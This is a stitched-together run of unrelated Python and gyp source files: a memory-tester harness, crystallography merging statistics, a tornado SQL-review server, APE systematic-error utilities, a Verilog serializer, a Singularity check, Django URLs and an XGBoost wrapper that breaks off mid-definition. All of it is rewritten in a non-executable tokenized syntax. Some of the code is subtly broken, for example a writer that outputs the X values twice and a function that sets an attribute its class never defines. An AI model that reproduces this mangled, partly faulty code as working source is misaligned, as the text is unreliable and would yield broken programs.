'''<line_sep>VERSION='.'.join(str(i)<for>i sys.version_info[:2])<if_stmt>len(sys.argv)<l>3<block_start>print('Usage:' sys.argv[0] '<path to AnalysisMemoryTester.exe> <output path>' file=sys.stderr)<line_sep>sys.exit(1)<block_end><if_stmt>sys.version_info[0]<eq>2<block_start><import_stmt>threading<def_stmt>wait p timeout<block_start>t=threading.Timer(timeout p.kill)<line_sep>t.daemon=<true><line_sep>t.start()<line_sep>p.wait()<line_sep>t.cancel()<block_end><block_end><else_stmt><block_start><def_stmt>wait p timeout<block_start>p.wait(timeout)<block_end><block_end>TOOL=os.path.abspath(sys.argv[1])<line_sep>OUTDIR=os.path.abspath(sys.argv[2]<if>len(sys.argv)<g>2<else>'.')<for_stmt>module os.listdir(os.path.join(sys.prefix 'Lib' 'site-packages'))<block_start><if_stmt>module<eq>'__pycache__'<block_start><continue><block_end><if_stmt><not>re.match(r'[a-z0-9_]+$' module re.I)<block_start><continue><block_end>outdir=os.path.join(OUTDIR module)<try_stmt><block_start>os.makedirs(outdir)<block_end><except_stmt>OSError<block_start><if_stmt><not>os.path.isdir(outdir)<block_start><raise><block_end><block_end>script=os.path.join(outdir SCRIPT_NAME.format(sys=sys module=module))<with_stmt>open(script 'w')<as>f<block_start>print(TEMPLATE.format(sys=sys module=module) file=f)<block_end>print("Testing" module)<line_sep>p=subprocess.Popen([TOOL script])<try_stmt><block_start>wait(p 3600)<block_end><except_stmt>KeyboardInterrupt<block_start>p.kill()<line_sep>sys.exit(0)<block_end><except_stmt><block_start>p.kill()<block_end><block_end>
|
<import_from_future_stmt> absolute_import division print_function<import_from_stmt>six.moves range<import_from_stmt>dials.array_family flex<import_from_stmt>libtbx table_utils<import_from_stmt>xfel.merging.application.worker worker<import_from_stmt>xfel.merging.application.reflection_table_utils reflection_table_utils<class_stmt>experiment_resolution_statistics(worker)<block_start>'''Calculates experiments accepted vs resolution bins'''<def_stmt>__init__ self params mpi_helper=<none> mpi_logger=<none><block_start>super(experiment_resolution_statistics self).__init__(params=params mpi_helper=mpi_helper mpi_logger=mpi_logger)<block_end><def_stmt>__repr__ self<block_start><return>'Lattices resolution'<block_end><def_stmt>run self experiments reflections<block_start>self.logger.log_step_time("EXPERIMENT_RESOLUTION_STATS")<line_sep># Get pre-created resolution binning objects from the parameters
self.resolution_binner=self.params.statistics.resolution_binner<line_sep>self.hkl_resolution_bins=self.params.statistics.hkl_resolution_bins<line_sep># How many bins do we have?
self.n_bins=self.resolution_binner.n_bins_all()# (self.params.statistics.n_bins + 2), 2 - to account for the hkls outside of the binner resolution range
# To enable MPI all-rank reduction, every rank must initialize statistics array(s), even if the rank doesn't have any reflections.
self.experiment_count_per_resolution_bins=flex.int(self.n_bins 0)<line_sep># Calculate, format and output statistics for each rank
<if_stmt>reflections.size()<g>0<block_start>self.count_experiments_per_resolution_bins(reflections)<line_sep>Experiment_Table_text=self.get_formatted_table(self.experiment_count_per_resolution_bins len(experiments))<line_sep>self.logger.log(Experiment_Table_text)<block_end># Accumulate statistics from all ranks
all_ranks_experiment_count_per_resolution_bins=self.mpi_helper.cumulative_flex(self.experiment_count_per_resolution_bins flex.int)<line_sep>all_ranks_total_experiment_count=self.mpi_helper.sum(len(experiments))<line_sep># Format and output all-rank total statistics
<if_stmt>self.mpi_helper.rank<eq>0<block_start>Experiment_Table_text=self.get_formatted_table(all_ranks_experiment_count_per_resolution_bins all_ranks_total_experiment_count)<line_sep>self.logger.main_log(Experiment_Table_text)<block_end>self.logger.log_step_time("EXPERIMENT_RESOLUTION_STATS" <true>)<line_sep><return>experiments reflections<block_end><def_stmt>get_formatted_table self experiment_count_per_bin total_experiment_count<block_start>'''Produce a table with experiment count over resolution bins'''<line_sep>table_data=[["Bin" "Resolution Range" "Lattices" "Accepted (%)"]]<for_stmt>i_bin self.resolution_binner.range_used()<block_start>col_legend='%-13s'%self.resolution_binner.bin_legend(i_bin=i_bin show_bin_number=<false> show_bin_range=<false> show_d_range=<true> show_counts=<false>)<line_sep>exp_count_abs='%8d'%experiment_count_per_bin[i_bin]<line_sep>exp_count_percent='%5.2f'%(100.<times>experiment_count_per_bin[i_bin]/total_experiment_count)<line_sep>table_data.append(['%3d'%i_bin col_legend exp_count_abs exp_count_percent])<block_end>table_data.append([""]<times>len(table_data[0]))<line_sep>table_data.append(["All" "" '%8d'%total_experiment_count])<line_sep><return>"\n Image Statistics\n"+table_utils.format(table_data has_header=1 justify='center' delim=' ')<block_end><def_stmt>count_experiments_per_resolution_bins self reflections<block_start>'''For each resolution bin, count experiments that contributed reflections to that bin'''<line_sep># Sort all reflections on asu hkls
self.logger.log_step_time("SORT")<line_sep>self.logger.log("Sorting reflection table...")<line_sep>reflections.sort('miller_index_asymmetric')<line_sep>self.logger.log_step_time("SORT" <true>)<line_sep># Initialize a dictionary to store unique experiment ids in resolution bins
experiments_per_resolution_bins={}<for_stmt>i_bin range(self.n_bins)<block_start>experiments_per_resolution_bins[i_bin]=set()<block_end># Accumulate experiment ids in the resolution bins where those experiments contributed reflections
<for_stmt>refls reflection_table_utils.get_next_hkl_reflection_table(reflections=reflections)<block_start><if_stmt>refls.size()<eq>0<block_start><break># unless the input "reflections" list is empty, generated "refls" lists cannot be empty
<block_end>hkl=refls[0]['miller_index_asymmetric']<if_stmt>hkl<in>self.hkl_resolution_bins<block_start>i_bin=self.hkl_resolution_bins[hkl]<for_stmt>refl refls.rows()<block_start>experiments_per_resolution_bins[i_bin].add(refl['exp_id'])<block_end><block_end><block_end># For each bin, reduce the sets of unique experiment ids to their count
<for_stmt>i_bin range(self.resolution_binner.n_bins_all())<block_start>self.experiment_count_per_resolution_bins[i_bin]=len(experiments_per_resolution_bins[i_bin])<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start><import_from_stmt>xfel.merging.application.worker exercise_worker<line_sep>exercise_worker(experiment_resolution_statistics)<block_end>
|
# encoding: utf-8
"""
Extra capabilities for IPython
"""<line_sep>#-----------------------------------------------------------------------------
# Copyright (C) 2008-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
<import_from_stmt>IPython.lib.security passwd<line_sep>#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
# -*-coding:utf-8-*-
<import_stmt>os<import_stmt>tornado.ioloop<import_stmt>tornado.autoreload<import_from_stmt>webui view<def_stmt>run_server config host=<none> port=7000<block_start>handlers=[(r"/" view.SqlReRuleSetIndex) (r"/sqlreview/rule/simple/addition" view.RuleSimpleAdditoin) (r"/sqlreview/rule/complex/addition" view.RuleComplexAddition) (r"/sqlreview/rule/addition" view.RuleAddition) (r"/new/version/sql/review/rule/info/index" view.SqlReRuleSetInfoIndex) (r"/sqlreview/rule/upload" view.RuleUpload) (r"/sqlreview/rule/info" view.SqlReviewRuleInfo) (r"/new/version/sql/review/get/struct" view.SqlReviewGetStruct) (r"/new/version/sql/review/task/index" view.SqlReviewTaskIndex) (r"/new/version/sql/review/job/data" view.SqlReviewJobData) (r"/new/version/sql/review/task/rule/info" view.SqlReviewTaskRuleInfo) (r"/new/version/sql/review/task/rule/detail/info" view.SqlReviewTaskRuleDetailInfo) (r"/new/version/sql/review/task/rule/plan/info" view.SqlReviewTaskRulePlanInfo) (r"/new/version/sql/review/task/rule/text/info" view.SqlReviewTaskRuleTextInfo) # (r"/new/version/sql/review/prevent/object/index", view.SqlReviewPreventObjectIndex),
# (r"/new/version/sql/review/prevent/object", view.SqlReviewPreventObject),
(r"/new/version/sql/review/get/db/user/list" view.SqlReviewGetDbUserList) (r"/new/version/sql/review/get/db/port" view.SqlReviewGetDbPort) (r"/new/version/sql/review/task/publish" view.SqlReviewTaskPublish) (r"/new/version/sql/review/task/rule/export" view.SqlReviewRuleExport)]<line_sep>application=tornado.web.Application(handlers template_path=os.path.join(os.path.dirname(__file__) "template") static_path=os.path.join(os.path.dirname(__file__) "static") debug=<true> config=config)<line_sep>application.listen(port)<line_sep>tornado.ioloop.IOLoop.instance().start()<block_end><if_stmt>__name__<eq>"__main__"<block_start>application.listen(server_port)<line_sep>tornado.ioloop.IOLoop.instance().start()<block_end>
|
# third party
<import_from_stmt>pytest raises<line_sep># syft absolute
<import_from_stmt>syft.core.common.serde.deserialize _deserialize<def_stmt>test_fail_deserialize_no_format <arrow><none><block_start><with_stmt>raises(TypeError)<block_start>_deserialize(blob="to deserialize" from_proto=<false>)<block_end><block_end><def_stmt>test_fail_deserialize_wrong_format <arrow><none><block_start><with_stmt>raises(TypeError match="You tried to deserialize an unsupported type.")<block_start>_deserialize(blob="to deserialize")<block_end><block_end>
|
<import_stmt>numpy<as>np<import_stmt>ROOT<line_sep>DIR_BOTH=0<line_sep>DIR_UP=1<line_sep>DIR_DOWN=-1<line_sep>NUM_SECTORS=68<line_sep>NUM_SECTORS_Y=14<line_sep># systematics has:
# a dict with with coordinate names "X", "Y" as keys
# - each value of these keys is a list/an array of systematic errors for each sector
# - so the list has the length of the number of sectors for that coordinate
# - these errors are quadratically added
# direction which can be DIR_DOWN, DIR_BOTH, or DIR_UP, depending on whether it adds only down, symmetric or up
# isRelative which is a flag telling whether the error is relative to the APE value or absolute
<class_stmt>SystematicErrors<block_start><def_stmt>__init__ self<block_start>self.X=np.zeros(NUM_SECTORS)<line_sep>self.Y=np.zeros(NUM_SECTORS)<line_sep># is not made seperately for X and Y. If this is wanted, make two separate objects
self.isRelative=np.zeros(NUM_SECTORS dtype=int)<line_sep>self.direction=np.empty(NUM_SECTORS dtype=int)<line_sep>self.direction.fill(DIR_BOTH)<block_end># just so it is clear that
<def_stmt>__getitem__ self key<block_start><return>getattr(self key)<block_end><def_stmt>getXFromList self X startat=0<block_start><for_stmt>i,x enumerate(X)<block_start>self.X[i+startat]=x<block_end><block_end><def_stmt>getYFromList self Y startat=0<block_start><for_stmt>i,y enumerate(Y)<block_start>self.Y[i+startat]=y<block_end><block_end># each line has the structure: xerr yerr isrel direction
<def_stmt>write self fileName<block_start><with_stmt>open(fileName "w")<as>fi<block_start><for_stmt>x,y,rel,direc zip(self.X self.X self.isRelative self.direction)<block_start>fi.write("{} {} {} {}".format(x y rel direc))<block_end><block_end><block_end><def_stmt>read self fileName<block_start><with_stmt>open(fileName "r")<as>fi<block_start>sector=0<for_stmt>line fi<block_start>x,y,rel,direc=line.rstrip().split(" ")<line_sep>self.X[sector]=float(x)<line_sep>self.Y[sector]=float(y)<line_sep>self.isRelative[sector]=int(rel)<line_sep>self.direction[sector]=int(direc)<line_sep>sector<augadd>1<block_end><block_end><return>self<block_end><block_end># difference between ape values in each sector
# returns a SystematicErrors object with values
<def_stmt>apeDifference minuend subtrahend<block_start>fileA=ROOT.TFile(minuend "READ")<line_sep>fileB=ROOT.TFile(subtrahend "READ")<line_sep>apeTreeA_X=fileA.Get("iterTreeX")<line_sep>apeTreeA_X.SetDirectory(0)<line_sep>apeTreeB_X=fileB.Get("iterTreeX")<line_sep>apeTreeB_X.SetDirectory(0)<line_sep>apeTreeA_Y=fileA.Get("iterTreeY")<line_sep>apeTreeA_Y.SetDirectory(0)<line_sep>apeTreeB_Y=fileB.Get("iterTreeY")<line_sep>apeTreeB_Y.SetDirectory(0)<line_sep>fileA.Close()<line_sep>fileB.Close()<line_sep># get to last iteration of each tree
apeTreeA_X.GetEntry(apeTreeA_X.GetEntries()-1)<line_sep>apeTreeB_X.GetEntry(apeTreeB_X.GetEntries()-1)<line_sep>apeTreeA_Y.GetEntry(apeTreeA_Y.GetEntries()-1)<line_sep>apeTreeB_Y.GetEntry(apeTreeB_Y.GetEntries()-1)<line_sep>difference=SystematicErrors()<line_sep>isRel=0<line_sep>direc=0<for_stmt>sector range(1 NUM_SECTORS+1)<block_start>name="Ape_Sector_{}".format(sector)<line_sep>diffX=abs(getattr(apeTreeA_X name)-getattr(apeTreeB_X name))<line_sep>difference.X[sector-1]=diffX<if_stmt>sector<le>NUM_SECTORS_Y<block_start>diffY=abs(getattr(apeTreeA_Y name)-getattr(apeTreeB_Y name))<line_sep>difference.Y[sector-1]=diffY<block_end>difference.isRel[sector-1]=isRel<line_sep>difference.direction[sector-1]=direc<block_end><return>difference<block_end># inFile is allData.root, not allData_iterationApe.root
# returns two arrays with values in x and y
<def_stmt>numberOfHits inFileName<block_start>inFile=ROOT.TFile(inFileName "READ")<line_sep>num_x=np.zeros(NUM_SECTORS dtype=int)<line_sep>num_y=np.zeros(NUM_SECTORS dtype=int)<for_stmt>sector range(1 NUM_SECTORS+1)<block_start>xhist=inFile.Get("ApeEstimator1/Sector_{}/Results/h_ResX".format(sector))<line_sep>num_x[sector-1]=xhist.GetEntries()<if_stmt>sector<le>NUM_SECTORS_Y<block_start>yhist=inFile.Get("ApeEstimator1/Sector_{}/Results/h_ResY".format(sector))<line_sep>num_y[sector-1]=yhist.GetEntries()<block_end><block_end>inFile.Close()<line_sep><return>num_x num_y<block_end><def_stmt>main <block_start><pass><block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end>
|
<import_from_stmt>copy copy<import_from_stmt>typing Optional List<import_from_stmt>hdlConvertorAst.hdlAst HdlStmIf HdlOp HdlOpType HdlValueId HdlModuleDec iHdlStatement<import_from_stmt>hdlConvertorAst.hdlAst._defs HdlIdDef<import_from_stmt>hdlConvertorAst.hdlAst._expr HdlTypeAuto<import_from_stmt>hdlConvertorAst.hdlAst._statements HdlStmProcess HdlStmBlock HdlStmAssign HdlStmWait<import_from_stmt>hdlConvertorAst.to.verilog.keywords IEEE1800_2017_KEYWORDS<import_from_stmt>hdlConvertorAst.translate.common.name_scope LanguageKeyword NameScope<import_from_stmt>hdlConvertorAst.translate.verilog_to_basic_hdl_sim_model.utils hdl_call<import_from_stmt>hwt.hdl.portItem HdlPortItem<import_from_stmt>hwt.hdl.types.array HArray<import_from_stmt>hwt.hdl.types.defs STR INT BOOL<import_from_stmt>hwt.serializer.generic.to_hdl_ast ToHdlAst<import_from_stmt>hwt.serializer.verilog.context SignalTypeSwap<import_from_stmt>hwt.serializer.verilog.ops ToHdlAstVerilog_ops<import_from_stmt>hwt.serializer.verilog.statements ToHdlAstVerilog_statements<import_from_stmt>hwt.serializer.verilog.types ToHdlAstVerilog_types<import_from_stmt>hwt.serializer.verilog.utils SIGNAL_TYPE verilogTypeOfSig<import_from_stmt>hwt.serializer.verilog.value ToHdlAstVerilog_Value<class_stmt>ToHdlAstVerilog(ToHdlAstVerilog_types ToHdlAstVerilog_Value ToHdlAstVerilog_statements ToHdlAstVerilog_ops ToHdlAst)<block_start>_keywords_dict={kw:LanguageKeyword()<for>kw IEEE1800_2017_KEYWORDS}<def_stmt>__init__ self name_scope:Optional[NameScope]=<none><block_start>ToHdlAst.__init__(self name_scope=name_scope)<line_sep>self.signalType=SIGNAL_TYPE.PORT_WIRE<block_end><def_stmt>as_hdl_HdlModuleDef_variable self v types hdl_types hdl_variables processes component_insts<block_start>new_v=copy(v)<with_stmt>SignalTypeSwap(self verilogTypeOfSig(v.origin))<block_start>t=v.type<line_sep># if type requires extra definition
<if_stmt>self.does_type_requires_extra_def(t types)<block_start>_t=self.as_hdl_HdlType(t declaration=<true>)<line_sep>hdl_types.append(_t)<line_sep>types.add(t)<block_end>new_v.type=self.as_hdl_HdlType(t declaration=<false>)<line_sep># this is a array variable which requires value intialization in init
# process
<if_stmt>isinstance(t HArray)<block_start><if_stmt>v.value.vld_mask<block_start>rom=v.origin<line_sep>p=HdlStmProcess()<line_sep>label=self.name_scope.checked_name(rom.name+"_rom_init" p)<line_sep>p.labels.append(label)<line_sep>p.body=HdlStmBlock()<line_sep>body=p.body.body<for_stmt>i,_v enumerate(rom.def_val.val)<block_start>a=HdlStmAssign(self.as_hdl_int(int(_v)) self.as_hdl(rom[i]))<line_sep>a.is_blocking=<true><line_sep>body.append(a)<block_end>w=HdlStmWait()<line_sep>w.val=[]# initial process
body.append(w)<line_sep>processes.append(p)<block_end># because we would not be able to initialize const/localparam variable later
new_v.is_const=<false><line_sep>new_v.value=<none><block_end><elif_stmt>new_v.value<is><not><none><block_start><if_stmt>new_v.value.vld_mask<block_start>new_v.value=self.as_hdl_Value(new_v.value)<block_end><else_stmt># 'x' is a default value no need to specify it extra
<block_start>new_v.value=<none><block_end><block_end><return>new_v<block_end><block_end><def_stmt>_static_assert_false self msg:str<block_start><return>hdl_call(HdlValueId("$error") [f"%m {msg:s}"])<block_end><def_stmt>_static_assert_symbol_eq self symbol_name:str v<block_start>i=HdlStmIf()<line_sep>i.in_preproc=<true><line_sep># [TODO] this actually requires SV>=2009
# generate
# if (p==x) begin
# $error("%m Generated only for this param value");
# end
# endgenerate
i.cond=HdlOp(HdlOpType.NE [HdlValueId(symbol_name) v])<line_sep>i.if_true=hdl_call(HdlValueId("$error") ["%m Generated only for this param value" ])<line_sep><return>i<block_end><def_stmt>as_hdl_GenericItem self g:HdlIdDef<block_start><with_stmt>SignalTypeSwap(self SIGNAL_TYPE.PORT_WIRE)<block_start>new_v=copy(g)<line_sep>v=g.value<if_stmt>v._dtype<eq>STR<or>v._dtype<eq>INT<or>v._dtype<eq>BOOL<block_start>t=HdlTypeAuto<block_end><else_stmt><block_start>t=self.as_hdl_HdlType(v._dtype)<block_end>new_v.type=t<assert_stmt>new_v.value<is><not><none> g<line_sep>new_v.value=self.as_hdl_Value(v)<line_sep><return>new_v<block_end><block_end><def_stmt>as_hdl_HdlPortItem self pi:HdlPortItem<block_start><with_stmt>SignalTypeSwap(self verilogTypeOfSig(pi))<block_start>v=super(ToHdlAstVerilog self).as_hdl_HdlPortItem(pi)<line_sep>v.is_latched=self.signalType<eq>SIGNAL_TYPE.PORT_REG<block_end><return>v<block_end><def_stmt>_as_hdl_HdlModuleDef_param_asserts self new_m:HdlModuleDec<arrow>List[iHdlStatement]<block_start><return>ToHdlAst._as_hdl_HdlModuleDef_param_asserts_real(self new_m)<block_end><block_end>
|
"""Support for executing Docker containers using the Singularity 2.x engine."""<import_stmt>os<import_stmt>os.path<import_from_stmt>subprocess DEVNULL PIPE Popen TimeoutExpired# nosec
<import_from_stmt>typing Optional<line_sep>_USERNS=<none># type: Optional[bool]
<def_stmt>singularity_supports_userns <arrow>bool<block_start>"""Confirm if the version of Singularity install supports the --userns flag."""<line_sep><global>_USERNS# pylint: disable=global-statement
<if_stmt>_USERNS<is><none><block_start><try_stmt><block_start>hello_image=os.path.join(os.path.dirname(__file__) "hello.simg")<line_sep>result=Popen(# nosec
["singularity" "exec" "--userns" hello_image "true"] stderr=PIPE stdout=DEVNULL universal_newlines=<true> ).communicate(timeout=60)[1]<line_sep>_USERNS=("No valid /bin/sh"<in>result<or>"/bin/sh doesn't exist in container"<in>result<or>"executable file not found in"<in>result)<block_end><except_stmt>TimeoutExpired<block_start>_USERNS=<false><block_end><block_end><return>_USERNS<block_end>
|
# Copyright 2017 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
<import_from_stmt>oslo_config cfg<import_from_stmt>stevedore named<line_sep>CONF=cfg.CONF<def_stmt>get_import_plugins **kwargs<block_start>task_list=CONF.image_import_opts.image_import_plugins<line_sep>extensions=named.NamedExtensionManager('glance.image_import.plugins' names=task_list name_order=<true> invoke_on_load=<true> invoke_kwds=kwargs)<for_stmt>extension extensions.extensions<block_start><yield>extension.obj<block_end><block_end>
|
{'includes':['../common.gyp'] 'targets':[{'target_name':'libzxing' 'type':'static_library' 'include_dirs':['core/src' ] 'sources':['core/src/bigint/BigInteger.cc' 'core/src/bigint/BigIntegerAlgorithms.cc' 'core/src/bigint/BigIntegerUtils.cc' 'core/src/bigint/BigUnsigned.cc' 'core/src/bigint/BigUnsignedInABase.cc' 'core/src/zxing/BarcodeFormat.cpp' 'core/src/zxing/Binarizer.cpp' 'core/src/zxing/BinaryBitmap.cpp' 'core/src/zxing/ChecksumException.cpp' 'core/src/zxing/DecodeHints.cpp' 'core/src/zxing/Exception.cpp' 'core/src/zxing/FormatException.cpp' 'core/src/zxing/InvertedLuminanceSource.cpp' 'core/src/zxing/LuminanceSource.cpp' 'core/src/zxing/MultiFormatReader.cpp' 'core/src/zxing/Reader.cpp' 'core/src/zxing/Result.cpp' 'core/src/zxing/ResultIO.cpp' 'core/src/zxing/ResultPoint.cpp' 'core/src/zxing/ResultPointCallback.cpp' 'core/src/zxing/aztec/AztecDetectorResult.cpp' 'core/src/zxing/aztec/AztecReader.cpp' 'core/src/zxing/aztec/decoder/1Decoder.cpp' 'core/src/zxing/aztec/detector/1Detector.cpp' 'core/src/zxing/common/BitArray.cpp' 'core/src/zxing/common/BitArrayIO.cpp' 'core/src/zxing/common/BitMatrix.cpp' 'core/src/zxing/common/BitSource.cpp' 'core/src/zxing/common/CharacterSetECI.cpp' 'core/src/zxing/common/DecoderResult.cpp' 'core/src/zxing/common/DetectorResult.cpp' 'core/src/zxing/common/GlobalHistogramBinarizer.cpp' 'core/src/zxing/common/GreyscaleLuminanceSource.cpp' 'core/src/zxing/common/GreyscaleRotatedLuminanceSource.cpp' 'core/src/zxing/common/GridSampler.cpp' 'core/src/zxing/common/HybridBinarizer.cpp' 'core/src/zxing/common/IllegalArgumentException.cpp' 'core/src/zxing/common/PerspectiveTransform.cpp' 'core/src/zxing/common/Str.cpp' 'core/src/zxing/common/StringUtils.cpp' 'core/src/zxing/common/detector/MonochromeRectangleDetector.cpp' 'core/src/zxing/common/detector/WhiteRectangleDetector.cpp' 'core/src/zxing/common/reedsolomon/GenericGF.cpp' 'core/src/zxing/common/reedsolomon/GenericGFPoly.cpp' 'core/src/zxing/common/reedsolomon/ReedSolomonDecoder.cpp' 'core/src/zxing/common/reedsolomon/ReedSolomonException.cpp' 'core/src/zxing/datamatrix/1Version.cpp' 'core/src/zxing/datamatrix/DataMatrixReader.cpp' 'core/src/zxing/datamatrix/decoder/1BitMatrixParser.cpp' 'core/src/zxing/datamatrix/decoder/1DataBlock.cpp' 'core/src/zxing/datamatrix/decoder/1DecodedBitStreamParser.cpp' 'core/src/zxing/datamatrix/decoder/2Decoder.cpp' 'core/src/zxing/datamatrix/detector/2Detector.cpp' 'core/src/zxing/datamatrix/detector/CornerPoint.cpp' 'core/src/zxing/datamatrix/detector/DetectorException.cpp' 'core/src/zxing/multi/ByQuadrantReader.cpp' 'core/src/zxing/multi/GenericMultipleBarcodeReader.cpp' 'core/src/zxing/multi/MultipleBarcodeReader.cpp' 'core/src/zxing/multi/qrcode/QRCodeMultiReader.cpp' 'core/src/zxing/multi/qrcode/detector/MultiDetector.cpp' 'core/src/zxing/multi/qrcode/detector/MultiFinderPatternFinder.cpp' 'core/src/zxing/oned/CodaBarReader.cpp' 'core/src/zxing/oned/Code128Reader.cpp' 'core/src/zxing/oned/Code39Reader.cpp' 'core/src/zxing/oned/Code93Reader.cpp' 'core/src/zxing/oned/EAN13Reader.cpp' 'core/src/zxing/oned/EAN8Reader.cpp' 'core/src/zxing/oned/ITFReader.cpp' 'core/src/zxing/oned/MultiFormatOneDReader.cpp' 'core/src/zxing/oned/MultiFormatUPCEANReader.cpp' 'core/src/zxing/oned/OneDReader.cpp' 'core/src/zxing/oned/OneDResultPoint.cpp' 'core/src/zxing/oned/UPCAReader.cpp' 'core/src/zxing/oned/UPCEANReader.cpp' 'core/src/zxing/oned/UPCEReader.cpp' 'core/src/zxing/pdf417/PDF417Reader.cpp' 'core/src/zxing/pdf417/decoder/2BitMatrixParser.cpp' 'core/src/zxing/pdf417/decoder/2DecodedBitStreamParser.cpp' 'core/src/zxing/pdf417/decoder/3Decoder.cpp' 'core/src/zxing/pdf417/decoder/ec/ErrorCorrection.cpp' 'core/src/zxing/pdf417/decoder/ec/ModulusGF.cpp' 'core/src/zxing/pdf417/decoder/ec/ModulusPoly.cpp' 'core/src/zxing/pdf417/detector/3Detector.cpp' 'core/src/zxing/pdf417/detector/LinesSampler.cpp' 'core/src/zxing/qrcode/2Version.cpp' 'core/src/zxing/qrcode/ErrorCorrectionLevel.cpp' 'core/src/zxing/qrcode/FormatInformation.cpp' 'core/src/zxing/qrcode/QRCodeReader.cpp' 'core/src/zxing/qrcode/decoder/2DataBlock.cpp' 'core/src/zxing/qrcode/decoder/3BitMatrixParser.cpp' 'core/src/zxing/qrcode/decoder/3DecodedBitStreamParser.cpp' 'core/src/zxing/qrcode/decoder/4Decoder.cpp' 'core/src/zxing/qrcode/decoder/DataMask.cpp' 'core/src/zxing/qrcode/decoder/Mode.cpp' 'core/src/zxing/qrcode/detector/4Detector.cpp' 'core/src/zxing/qrcode/detector/AlignmentPattern.cpp' 'core/src/zxing/qrcode/detector/AlignmentPatternFinder.cpp' 'core/src/zxing/qrcode/detector/FinderPattern.cpp' 'core/src/zxing/qrcode/detector/FinderPatternFinder.cpp' 'core/src/zxing/qrcode/detector/FinderPatternInfo.cpp' ] 'conditions':[['OS=="win"' {'include_dirs':['core/src/win32/zxing/' ] 'sources':['core/src/win32/zxing/win_iconv.c' ] }] ] } ]}<line_sep>
|
<import_from_stmt>django.conf.urls.defaults patterns url<line_sep>urlpatterns=patterns('users.views' url('^login/$' 'login' name='login') url('^logout/$' 'logout' name='logout') url(r'^find-friends/$' 'find_friends' name='find_friends') url(r'^modify-friend/$' 'modify_friend' name='modify_friend') )<line_sep>
|
# Copyright (c) 2018 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
<import_from_stmt>functools reduce<import_from_stmt>operator mul<def_stmt>sum_aggregation inputs<block_start><return>sum(inputs)<block_end><def_stmt>prod_aggregation inputs<block_start><return>reduce(mul inputs 1)<block_end>str_to_aggregation={'sum':sum_aggregation 'prod':prod_aggregation }<line_sep>
|
# -*- coding: utf-8 -*-
"""
@author: <NAME> <<EMAIL>>
@brief: utils for XGBoost models
"""<import_stmt>numpy<as>np<import_stmt>matplotlib<line_sep>matplotlib.use('Agg')<import_stmt>xgboost<as>xgb<class_stmt>XGBRegressor<block_start><def_stmt>__init__ self booster='gbtree' base_score=0. colsample_bylevel=1. colsample_bytree=1. gamma=0. learning_rate=0.1 max_delta_step=0. max_depth=6 min_child_weight=1. missing=<none> n_estimators=100 nthread=1 objective='reg:linear' reg_alpha=1. reg_lambda=0. reg_lambda_bias=0. seed=0 silent=<true> subsample=1.<block_start>self.param={"objective":objective "booster":booster "eta":learning_rate "max_depth":max_depth "colsample_bylevel":colsample_bylevel "colsample_bytree":colsample_bytree "subsample":subsample "min_child_weight":min_child_weight "gamma":gamma "alpha":reg_alpha "lambda":reg_lambda "lambda_bias":reg_lambda_bias "seed":seed "silent":1<if>silent<else>0 "nthread":nthread "max_delta_step":max_delta_step }<line_sep>self.missing=missing<if>missing<is><not><none><else>np.nan<line_sep>self.n_estimators=n_estimators<line_sep>self.base_score=base_score<block_end><def_stmt>__str__ self<block_start><return>self.__repr__()<block_end><def_stmt>__repr__ self<block_start><return>("%s(booster=\'%s\', base_score=%f, colsample_bylevel=%f, \n"<concat>"colsample_bytree=%f, gamma=%f, learning_rate=%f, max_delta_step=%f, \n"<concat>"max_depth=%d, min_child_weight=%f, missing=\'%s\', n_estimators=%d, \n"<concat>"nthread=%d, objective=\'%s\', reg_alpha=%f, reg_lambda=%f, \n"<concat>"reg_lambda_bias=%f, seed=%d, silent=%d, subsample=%f)"%(self.__class__.__name__ self.param["booster"] self.base_score self.param["colsample_bylevel"] self.param["colsample_bytree"] self.param["gamma"] self.param["eta"] self.param["max_delta_step"] self.param["max_depth"] self.param["min_child_weight"] str(self.missing) self.n_estimators self.param["nthread"] self.param["objective"] self.param["alpha"] self.param["lambda"] self.param["lambda_bias"] self.param["seed"] self.param["silent"] self.param["subsample"] ))<block_end><def_stmt>fit self X y feature_names=<none><block_start>data=xgb.DMatrix(X label=y missing=self.missing feature_names=feature_names)<line_sep>data.set_base_margin(self.base_score<times>np.ones(X.shape[0]))<line_sep>self.model=xgb.train(self.param data self.n_estimators)<line_sep><return>self<block_end><def_stmt>predict self X feature_names=<none><block_start>data=xgb.DMatrix(X missing=self.missing feature_names=feature_names)<line_sep>data.set_base_margin(self.base_score<times>np.ones(X.shape[0]))<line_sep>y_pred=self.model.predict(data)<line_sep><return>y_pred<block_end><def_stmt>plot_importance self<block_start>ax=xgb.plot_importance(self.model)<line_sep>self.save_topn_features()<line_sep><return>ax<block_end><def_stmt>save_topn_features self fname="XGBRegressor_topn_features.txt" topn=-1<block_start>ax=xgb.plot_importance(self.model)<line_sep>yticklabels=ax.get_yticklabels()[::-1]<if_stmt>topn<eq>-1<block_start>topn=len(yticklabels)<block_end><else_stmt><block_start>topn=min(topn len(yticklabels))<block_end><with_stmt>open(fname "w")<as>f<block_start><for_stmt>i range(topn)<block_start>f.write("%s\n"%yticklabels[i].get_text())<block_end><block_end><block_end><block_end><class_stmt>XGBClassifier<block_start><def_stmt>__init__ self num_class=2 booster='gbtree' base_score=0. colsample_bylevel=1. colsample_bytree=1. gamma=0. learning_rate=0.1 max_delta_step=0. max_depth=6 min_child_weight=1. missing=<none> n_estimators=100 